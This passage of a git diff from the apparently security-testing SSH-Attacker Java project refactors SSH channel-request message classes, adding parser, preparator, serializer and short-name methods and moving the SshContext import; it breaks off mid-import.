+++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelOpenUnknownMessage.java @@ -9,8 +9,12 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.connection.handler.ChannelOpenUnknownMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelOpenUnknownMessageParser; +import de.rub.nds.sshattacker.core.protocol.connection.preparator.ChannelOpenUnknownMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.connection.serializer.ChannelOpenUnknownMessageSerializer; +import java.io.InputStream; public class ChannelOpenUnknownMessage extends ChannelOpenMessage { @@ -31,6 +35,26 @@ public void setTypeSpecificData(ModifiableByteArray typeSpecificData) { @Override public ChannelOpenUnknownMessageHandler getHandler(SshContext context) { - return new ChannelOpenUnknownMessageHandler(context, this); + return new ChannelOpenUnknownMessageHandler(context); + } + + @Override + public ChannelOpenUnknownMessageParser getParser(SshContext context, InputStream stream) { + return new ChannelOpenUnknownMessageParser(stream); + } + + @Override + public ChannelOpenUnknownMessagePreparator getPreparator(SshContext context) { + return new ChannelOpenUnknownMessagePreparator(context.getChooser(), this); + } + + @Override + public ChannelOpenUnknownMessageSerializer getSerializer(SshContext context) { + return new ChannelOpenUnknownMessageSerializer(this); + } + + @Override + public String toShortString() { + return "UNKONW"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestAuthAgentMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestAuthAgentMessage.java index d10a7ee4e..c4ce7df83 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestAuthAgentMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestAuthAgentMessage.java @@ -7,14 +7,38 @@ */ package de.rub.nds.sshattacker.core.protocol.connection.message; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.connection.handler.ChannelRequestAuthAgentMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelRequestAuthAgentMessageParser; +import de.rub.nds.sshattacker.core.protocol.connection.preparator.ChannelRequestAuthAgentMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.connection.serializer.ChannelRequestAuthAgentMessageSerializer; +import java.io.InputStream; public class ChannelRequestAuthAgentMessage extends ChannelRequestMessage { @Override public ChannelRequestAuthAgentMessageHandler getHandler(SshContext context) { - return new ChannelRequestAuthAgentMessageHandler(context, this); + return new ChannelRequestAuthAgentMessageHandler(context); + } + + @Override + public ChannelRequestAuthAgentMessageParser getParser(SshContext context, InputStream stream) { + return new ChannelRequestAuthAgentMessageParser(stream); + } + + @Override + public ChannelRequestAuthAgentMessagePreparator getPreparator(SshContext context) { + return new ChannelRequestAuthAgentMessagePreparator(context.getChooser(), this); + } + + @Override + public ChannelRequestAuthAgentMessageSerializer getSerializer(SshContext context) { + return new ChannelRequestAuthAgentMessageSerializer(this); + } + + @Override + public String toShortString() { + return "AUTH_AGENT"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestBreakMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestBreakMessage.java index f0d72ba00..2eeea7d52 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestBreakMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestBreakMessage.java @@ -9,8 +9,12 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.integer.ModifiableInteger; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.connection.handler.ChannelRequestBreakMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelRequestBreakMessageParser; +import de.rub.nds.sshattacker.core.protocol.connection.preparator.ChannelRequestBreakMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.connection.serializer.ChannelRequestBreakMessageSerializer; +import java.io.InputStream; public class ChannelRequestBreakMessage extends ChannelRequestMessage { @@ -30,6 +34,26 @@ public void setBreakLength(int breakLength) { @Override public ChannelRequestBreakMessageHandler getHandler(SshContext context) { - return new ChannelRequestBreakMessageHandler(context, this); + return new ChannelRequestBreakMessageHandler(context); + } + + @Override + public ChannelRequestBreakMessageParser getParser(SshContext context, InputStream stream) { + return new ChannelRequestBreakMessageParser(stream); + } + + @Override + public ChannelRequestBreakMessagePreparator getPreparator(SshContext context) { + return new ChannelRequestBreakMessagePreparator(context.getChooser(), this); + } + + @Override + public ChannelRequestBreakMessageSerializer getSerializer(SshContext context) { + return new ChannelRequestBreakMessageSerializer(this); + } + + @Override + public String toShortString() { + return "CHAN_REQ_BREAK"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestEnvMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestEnvMessage.java index 533a7311f..ca97bca91 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestEnvMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestEnvMessage.java @@ -10,8 +10,12 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.integer.ModifiableInteger; import de.rub.nds.modifiablevariable.string.ModifiableString; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.connection.handler.ChannelRequestEnvMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelRequestEnvMessageParser; +import de.rub.nds.sshattacker.core.protocol.connection.preparator.ChannelRequestEnvMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.connection.serializer.ChannelRequestEnvMessageSerializer; +import java.io.InputStream; import java.nio.charset.StandardCharsets; public class ChannelRequestEnvMessage extends ChannelRequestMessage { @@ -111,6 +115,26 @@ public void setVariableValueLength(int variableValueLength) { @Override public ChannelRequestEnvMessageHandler getHandler(SshContext context) { - return new ChannelRequestEnvMessageHandler(context, this); + return new ChannelRequestEnvMessageHandler(context); + } + + @Override + public ChannelRequestEnvMessageParser getParser(SshContext context, InputStream stream) { + return new ChannelRequestEnvMessageParser(stream); + } + + @Override + public ChannelRequestEnvMessagePreparator getPreparator(SshContext context) { + return new ChannelRequestEnvMessagePreparator(context.getChooser(), this); + } + + @Override + public ChannelRequestEnvMessageSerializer getSerializer(SshContext context) { + return new ChannelRequestEnvMessageSerializer(this); + } + + @Override + public String toShortString() { + return "ENV_Message"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestExecMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestExecMessage.java index 159011a0d..df6f8c278 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestExecMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestExecMessage.java @@ -10,8 +10,13 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.integer.ModifiableInteger; import de.rub.nds.modifiablevariable.string.ModifiableString; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.protocol.connection.handler.ChannelRequestExecMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelRequestExecMessageParser; +import de.rub.nds.sshattacker.core.protocol.connection.preparator.ChannelRequestExecMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.connection.serializer.ChannelRequestExecMessageSerializer; +import java.io.InputStream; import java.nio.charset.StandardCharsets; public class ChannelRequestExecMessage extends ChannelRequestMessage { @@ -60,6 +65,27 @@ public void setCommand(String command, boolean adjustLengthField) { @Override public ChannelRequestExecMessageHandler getHandler(SshContext context) { - return new ChannelRequestExecMessageHandler(context, this); + return new ChannelRequestExecMessageHandler(context); + } + + @Override + public SshMessageParser getParser( + SshContext context, InputStream stream) { + return new ChannelRequestExecMessageParser(stream); + } + + @Override + public ChannelRequestExecMessagePreparator getPreparator(SshContext context) { + return new ChannelRequestExecMessagePreparator(context.getChooser(), this); + } + + @Override + public ChannelRequestExecMessageSerializer getSerializer(SshContext context) { + return new ChannelRequestExecMessageSerializer(this); + } + + @Override + public String toShortString() { + return "EXEC_MESSAGE"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestExitSignalMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestExitSignalMessage.java index 3f0d0198f..f83275580 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestExitSignalMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestExitSignalMessage.java @@ -12,8 +12,12 @@ import de.rub.nds.modifiablevariable.integer.ModifiableInteger; import de.rub.nds.modifiablevariable.string.ModifiableString; import de.rub.nds.sshattacker.core.constants.SignalType; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.connection.handler.ChannelRequestExitSignalMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelRequestExitSignalMessageParser; +import de.rub.nds.sshattacker.core.protocol.connection.preparator.ChannelRequestExitSignalMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.connection.serializer.ChannelRequestExitSignalMessageSerializer; +import java.io.InputStream; import java.nio.charset.StandardCharsets; public class ChannelRequestExitSignalMessage @@ -173,6 +177,26 @@ public void setErrorMessage(String errorMessage, boolean adjustLengthField) { @Override public ChannelRequestExitSignalMessageHandler getHandler(SshContext context) { - return new ChannelRequestExitSignalMessageHandler(context, this); + return new ChannelRequestExitSignalMessageHandler(context); + } + + @Override + public ChannelRequestExitSignalMessageParser getParser(SshContext context, InputStream stream) { + return new ChannelRequestExitSignalMessageParser(stream); + } + + @Override + public ChannelRequestExitSignalMessagePreparator getPreparator(SshContext context) { + return new ChannelRequestExitSignalMessagePreparator(context.getChooser(), this); + } + + @Override + public ChannelRequestExitSignalMessageSerializer getSerializer(SshContext context) { + return new ChannelRequestExitSignalMessageSerializer(this); + } + + @Override + public String toShortString() { + return "EXIT_SIGNAL"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestExitStatusMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestExitStatusMessage.java index 88faeee8f..f8c22aa48 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestExitStatusMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestExitStatusMessage.java @@ -9,8 +9,12 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.integer.ModifiableInteger; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.connection.handler.ChannelRequestExitStatusMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelRequestExitStatusMessageParser; +import de.rub.nds.sshattacker.core.protocol.connection.preparator.ChannelRequestExitStatusMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.connection.serializer.ChannelRequestExitStatusMessageSerializer; +import java.io.InputStream; public class ChannelRequestExitStatusMessage extends ChannelRequestMessage { @@ -31,6 +35,26 @@ public void setExitStatus(int exitStatus) { @Override public ChannelRequestExitStatusMessageHandler getHandler(SshContext context) { - return new ChannelRequestExitStatusMessageHandler(context, this); + return new ChannelRequestExitStatusMessageHandler(context); + } + + @Override + public ChannelRequestExitStatusMessageParser getParser(SshContext context, InputStream stream) { + return new ChannelRequestExitStatusMessageParser(stream); + } + + @Override + public ChannelRequestExitStatusMessagePreparator getPreparator(SshContext context) { + return new ChannelRequestExitStatusMessagePreparator(context.getChooser(), this); + } + + @Override + public ChannelRequestExitStatusMessageSerializer getSerializer(SshContext context) { + return new ChannelRequestExitStatusMessageSerializer(this); + } + + @Override + public String toShortString() { + return "EXIT_STATUS"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestPtyMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestPtyMessage.java index 13d0874a0..38c351602 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestPtyMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestPtyMessage.java @@ -11,8 +11,12 @@ import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; import de.rub.nds.modifiablevariable.integer.ModifiableInteger; import de.rub.nds.modifiablevariable.string.ModifiableString; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.connection.handler.ChannelRequestPtyMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelRequestPtyMessageParser; +import de.rub.nds.sshattacker.core.protocol.connection.preparator.ChannelRequestPtyMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.connection.serializer.ChannelRequestPtyMessageSerializer; +import java.io.InputStream; import java.nio.charset.StandardCharsets; public class ChannelRequestPtyMessage extends ChannelRequestMessage { @@ -167,6 +171,26 @@ public void setEncodedTerminalModes(byte[] encodedTerminalModes, boolean adjustL @Override public ChannelRequestPtyMessageHandler getHandler(SshContext context) { - return new ChannelRequestPtyMessageHandler(context, this); + return new ChannelRequestPtyMessageHandler(context); + } + + @Override + public ChannelRequestPtyMessageParser getParser(SshContext context, InputStream stream) { + return new ChannelRequestPtyMessageParser(stream); + } + + @Override + public ChannelRequestPtyMessagePreparator getPreparator(SshContext context) { + return new ChannelRequestPtyMessagePreparator(context.getChooser(), this); + } + + @Override + public ChannelRequestPtyMessageSerializer getSerializer(SshContext context) { + return new ChannelRequestPtyMessageSerializer(this); + } + + @Override + public String toShortString() { + return "REQ_PTY"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestShellMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestShellMessage.java index 600e54b91..e8e9dd591 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestShellMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestShellMessage.java @@ -7,13 +7,37 @@ */ package de.rub.nds.sshattacker.core.protocol.connection.message; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.connection.handler.ChannelRequestShellMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelRequestShellMessageParser; +import de.rub.nds.sshattacker.core.protocol.connection.preparator.ChannelRequestShellMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.connection.serializer.ChannelRequestShellMessageSerializer; +import java.io.InputStream; public class ChannelRequestShellMessage extends ChannelRequestMessage { @Override public ChannelRequestShellMessageHandler getHandler(SshContext context) { - return new ChannelRequestShellMessageHandler(context, this); + return new ChannelRequestShellMessageHandler(context); + } + + @Override + public ChannelRequestShellMessageParser getParser(SshContext context, InputStream stream) { + return new ChannelRequestShellMessageParser(stream); + } + + @Override + public ChannelRequestShellMessagePreparator getPreparator(SshContext context) { + return new ChannelRequestShellMessagePreparator(context.getChooser(), this); + } + + @Override + public ChannelRequestShellMessageSerializer getSerializer(SshContext context) { + return new ChannelRequestShellMessageSerializer(this); + } + + @Override + public String toShortString() { + return "REQ_SHELL"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestSignalMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestSignalMessage.java index 6e5215aee..9f220c02c 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestSignalMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestSignalMessage.java @@ -11,8 +11,12 @@ import de.rub.nds.modifiablevariable.integer.ModifiableInteger; import de.rub.nds.modifiablevariable.string.ModifiableString; import de.rub.nds.sshattacker.core.constants.SignalType; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.connection.handler.ChannelRequestSignalMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelRequestSignalMessageParser; +import de.rub.nds.sshattacker.core.protocol.connection.preparator.ChannelRequestSignalMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.connection.serializer.ChannelRequestSignalMessageSerializer; +import java.io.InputStream; import java.nio.charset.StandardCharsets; public class ChannelRequestSignalMessage @@ -70,6 +74,26 @@ public void setSignalName(SignalType signalName, boolean adjustLengthField) { @Override public ChannelRequestSignalMessageHandler getHandler(SshContext context) { - return new ChannelRequestSignalMessageHandler(context, this); + return new ChannelRequestSignalMessageHandler(context); + } + + @Override + public ChannelRequestSignalMessageParser getParser(SshContext context, InputStream stream) { + return new ChannelRequestSignalMessageParser(stream); + } + + @Override + public ChannelRequestSignalMessagePreparator getPreparator(SshContext context) { + return new ChannelRequestSignalMessagePreparator(context.getChooser(), this); + } + + @Override + public ChannelRequestSignalMessageSerializer getSerializer(SshContext context) { + return new ChannelRequestSignalMessageSerializer(this); + } + + @Override + public String toShortString() { + return "REQ_SIGNAL"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestSubsystemMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestSubsystemMessage.java index 288f3e44e..b655d159c 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestSubsystemMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestSubsystemMessage.java @@ -10,8 +10,12 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.integer.ModifiableInteger; import de.rub.nds.modifiablevariable.string.ModifiableString; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.connection.handler.ChannelRequestSubsystemMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelRequestSubsystemMessageParser; +import de.rub.nds.sshattacker.core.protocol.connection.preparator.ChannelRequestSubsystemMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.connection.serializer.ChannelRequestSubsystemMessageSerializer; +import java.io.InputStream; import java.nio.charset.StandardCharsets; public class ChannelRequestSubsystemMessage @@ -66,6 +70,26 @@ public void setSubsystemName(String subsystemName, boolean adjustLengthField) { @Override public ChannelRequestSubsystemMessageHandler getHandler(SshContext context) { - return new ChannelRequestSubsystemMessageHandler(context, this); + return new ChannelRequestSubsystemMessageHandler(context); + } + + @Override + public ChannelRequestSubsystemMessageParser getParser(SshContext context, InputStream stream) { + return new ChannelRequestSubsystemMessageParser(stream); + } + + @Override + public ChannelRequestSubsystemMessagePreparator getPreparator(SshContext context) { + return new ChannelRequestSubsystemMessagePreparator(context.getChooser(), this); + } + + @Override + public ChannelRequestSubsystemMessageSerializer getSerializer(SshContext context) { + return new ChannelRequestSubsystemMessageSerializer(this); + } + + @Override + public String toShortString() { + return "REQ_SUB"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestUnknownMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestUnknownMessage.java index dcb2394c1..c215b4374 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestUnknownMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestUnknownMessage.java @@ -9,8 +9,12 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.connection.handler.ChannelRequestUnknownMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelRequestUnknownMessageParser; +import de.rub.nds.sshattacker.core.protocol.connection.preparator.ChannelRequestUnknownMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.connection.serializer.ChannelRequestUnknownMessageSerializer; +import java.io.InputStream; public class ChannelRequestUnknownMessage extends ChannelRequestMessage { @@ -32,6 +36,26 @@ public void setTypeSpecificData(byte[] typeSpecificData) { @Override public ChannelRequestUnknownMessageHandler getHandler(SshContext context) { - return new ChannelRequestUnknownMessageHandler(context, this); + return new ChannelRequestUnknownMessageHandler(context); + } + + @Override + public ChannelRequestUnknownMessageParser getParser(SshContext context, InputStream stream) { + return new ChannelRequestUnknownMessageParser(stream); + } + + @Override + public ChannelRequestUnknownMessagePreparator getPreparator(SshContext context) { + return new ChannelRequestUnknownMessagePreparator(context.getChooser(), this); + } + + @Override + public ChannelRequestUnknownMessageSerializer getSerializer(SshContext context) { + return new ChannelRequestUnknownMessageSerializer(this); + } + + @Override + public String toShortString() { + return "REQ_UNKONW_MESSAEG"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestWindowChangeMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestWindowChangeMessage.java index e8f47b41d..7d22b5a67 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestWindowChangeMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestWindowChangeMessage.java @@ -9,8 +9,12 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.integer.ModifiableInteger; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.connection.handler.ChannelRequestWindowChangeMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelRequestWindowChangeMessageParser; +import de.rub.nds.sshattacker.core.protocol.connection.preparator.ChannelRequestWindowChangeMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.connection.serializer.ChannelRequestWindowChangeMessageSerializer; +import java.io.InputStream; public class ChannelRequestWindowChangeMessage extends ChannelRequestMessage { @@ -72,6 +76,27 @@ public void setHeightPixels(int heightPixels) { @Override public ChannelRequestWindowChangeMessageHandler getHandler(SshContext context) { - return new ChannelRequestWindowChangeMessageHandler(context, this); + return new ChannelRequestWindowChangeMessageHandler(context); + } + + @Override + public ChannelRequestWindowChangeMessageParser getParser( + SshContext context, InputStream inputStream) { + return new ChannelRequestWindowChangeMessageParser(inputStream); + } + + @Override + public ChannelRequestWindowChangeMessagePreparator getPreparator(SshContext context) { + return new ChannelRequestWindowChangeMessagePreparator(context.getChooser(), this); + } + + @Override + public ChannelRequestWindowChangeMessageSerializer getSerializer(SshContext context) { + return new ChannelRequestWindowChangeMessageSerializer(this); + } + + @Override + public String toShortString() { + return "REQ_WINDOW_CHANGE"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestX11Message.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestX11Message.java index 97ac090e6..17d04ffcd 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestX11Message.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestX11Message.java @@ -11,9 +11,13 @@ import de.rub.nds.modifiablevariable.integer.ModifiableInteger; import de.rub.nds.modifiablevariable.singlebyte.ModifiableByte; import de.rub.nds.modifiablevariable.string.ModifiableString; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.connection.handler.ChannelRequestX11MessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelRequestX11MessageParser; +import de.rub.nds.sshattacker.core.protocol.connection.preparator.ChannelRequestX11MessagePreparator; +import de.rub.nds.sshattacker.core.protocol.connection.serializer.ChannelRequestX11MessageSerializer; import de.rub.nds.sshattacker.core.util.Converter; +import java.io.InputStream; import java.nio.charset.StandardCharsets; public class ChannelRequestX11Message extends ChannelRequestMessage { @@ -166,6 +170,26 @@ public void setX11ScreenNumber(int x11ScreenNumber) { @Override public ChannelRequestX11MessageHandler getHandler(SshContext context) { - return new ChannelRequestX11MessageHandler(context, this); + return new ChannelRequestX11MessageHandler(context); + } + + @Override + public ChannelRequestX11MessageParser getParser(SshContext context, InputStream stream) { + return new ChannelRequestX11MessageParser(stream); + } + + @Override + public ChannelRequestX11MessagePreparator getPreparator(SshContext context) { + return new ChannelRequestX11MessagePreparator(context.getChooser(), this); + } + + @Override + public ChannelRequestX11MessageSerializer getSerializer(SshContext context) { + return new ChannelRequestX11MessageSerializer(this); + } + + @Override + public String toShortString() { + return "REQ_X11"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestXonXoffMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestXonXoffMessage.java index c6040a9d1..f85b86d8a 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestXonXoffMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestXonXoffMessage.java @@ -9,9 +9,13 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.singlebyte.ModifiableByte; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.connection.handler.ChannelRequestXonXoffMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelRequestXonXoffMessageParser; +import de.rub.nds.sshattacker.core.protocol.connection.preparator.ChannelRequestXonXoffMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.connection.serializer.ChannelRequestXonXoffMessageSerializer; import de.rub.nds.sshattacker.core.util.Converter; +import java.io.InputStream; public class ChannelRequestXonXoffMessage extends ChannelRequestMessage { @@ -37,6 +41,26 @@ public void setClientFlowControl(boolean clientFlowControl) { @Override public ChannelRequestXonXoffMessageHandler getHandler(SshContext context) { - return new ChannelRequestXonXoffMessageHandler(context, this); + return new ChannelRequestXonXoffMessageHandler(context); + } + + @Override + public ChannelRequestXonXoffMessageParser getParser(SshContext context, InputStream stream) { + return new ChannelRequestXonXoffMessageParser(stream); + } + + @Override + public ChannelRequestXonXoffMessagePreparator getPreparator(SshContext context) { + return new ChannelRequestXonXoffMessagePreparator(context.getChooser(), this); + } + + @Override + public ChannelRequestXonXoffMessageSerializer getSerializer(SshContext context) { + return new ChannelRequestXonXoffMessageSerializer(this); + } + + @Override + public String toShortString() { + return "REQ_XON_XOFF"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelSuccessMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelSuccessMessage.java index 9e7bb7429..5b5ed8815 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelSuccessMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelSuccessMessage.java @@ -7,13 +7,41 @@ */ package de.rub.nds.sshattacker.core.protocol.connection.message; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; import de.rub.nds.sshattacker.core.protocol.connection.handler.ChannelSuccessMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelSuccessMessageParser; +import de.rub.nds.sshattacker.core.protocol.connection.preparator.ChannelSuccessMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.connection.serializer.ChannelMessageSerializer; +import 